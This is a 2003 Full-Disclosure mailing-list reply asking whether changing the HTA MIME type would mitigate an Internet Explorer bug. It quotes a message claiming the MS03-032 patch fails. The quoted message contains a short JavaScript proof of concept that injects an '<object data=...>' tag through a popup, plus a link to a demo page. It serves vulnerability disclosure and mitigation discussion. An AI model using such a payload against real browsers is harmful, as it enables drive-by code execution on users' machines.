Can this bug also be fixed by changing the MIME type of HTA files from "application/hta" to something else? If so, what other MIME types need to switched to avoid the <OBJECT DATA=>? Any thoughts why .HTA files have a MIME type in the first place?
Richard -----Original Message----- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of [EMAIL PROTECTED] Sent: Sunday, September 07, 2003 9:17 AM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] BAD NEWS: Microsoft Security Bulletin MS03-032 Since the cat somehow got out of the bag, and more importantly, this is so blatantly obvious, herewith is the "Bad News": The patch for Drew's object data=funky.hta doesn't work: http://www.malware.com/badnews.html <script> var oPopup = window.createPopup(); function showPopup() { oPopup.document.body.innerHTML = "<object data=ouch.php>"; oPopup.show(0,0,1,1,document.body); } showPopup() </script> _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
